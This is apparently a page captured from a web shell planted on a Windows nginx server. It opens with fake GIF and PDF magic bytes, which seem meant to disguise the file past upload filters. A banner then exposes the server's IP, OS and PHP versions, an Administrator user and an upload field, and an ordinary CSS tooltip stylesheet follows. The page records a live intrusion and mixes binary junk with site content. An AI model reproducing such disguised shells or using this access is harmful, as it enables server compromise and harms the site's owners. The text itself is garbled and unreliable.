GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/css/ |
Upload File : |
@charset "utf-8"; /* css/tooltip.css */ #tooltipContainer { display:table; } #tooltipContainer > div{ display:table-cell; max-width: 50%; } #tooltipDiv { background-color:#eee; border:2px solid #ccc; color:#000; font-size:1em; margin:0px !important; padding: 0px 10px; position:absolute; text-align:left; visibility:hidden; white-space:pre-wrap; z-index:150; } #tooltipDiv table { font-size:1.0em; } #tooltipDiv.attention { background-color:#000; border-color:#000; color:#ff0; } #tooltipDiv.button { background-color:transparent; border:0; color:#C0C0C0; } #tooltipDiv.disabled { background-color:transparent; border-color:#888; color:#C0C0C0; } #tooltipDiv.error { background-color:#f00; border-color:#888; color:#fff; } #tooltip.error:before { display:none; } #tooltip.error:after { display:none; } #tooltipDiv.info { background-color:#eee; border-color:#6af; color:#6af; } #tooltipDiv.normal { background-color:#eee; border-color:#ccc; color:#000; } #tooltipDiv.opaque { opacity:.6; } #tooltipDiv.warn { background-color:#f90; border-color:#888; color:#fff; } #tooltip.warn:before { display:none; } #tooltip.warn:after { display:none; } #tooltipDiv.pre { font-family: monospace; line-height:1em; } abbr { border-bottom:2px dotted #888; cursor:help; } abbr.attention, abbr.available { border-bottom:1px dotted #000; color:#ff0; } abbr.button { border-bottom:0; } abbr.disabled { border-bottom:1px dotted #888; color:#888; } abbr.error { border-bottom:1px dotted #fff; } abbr.error:after { color:#fff; } abbr.error:before { content:"\00a0"; } abbr.error:after { content:" !\00a0"; } abbr.info { border-bottom:1px dotted #6af; } abbr.nodot { border-bottom:0; cursor:default } abbr.normal { border-bottom:1px dotted #888; } abbr.opaque { opacity:.6; } abbr.unavailable { border-bottom:1px dotted #999; } abbr.underline { border-bottom-style:solid; border-bottom-width:1px; } abbr.warn { border-bottom:1px dotted #fff; } abbr.warn:after { color:#fff; } abbr.warn:before { content:"\00a0"; } abbr.warn:after { content:" !\00a0"; } abbr.pre { white-space: pre-wrap; } #movementDiv { background-color:#ffc; border:2px solid silver; color:#000; display:inline; position:absolute; overflow:hidden; visibility:hidden; text-align:left; vertical-align:top; z-index:200; }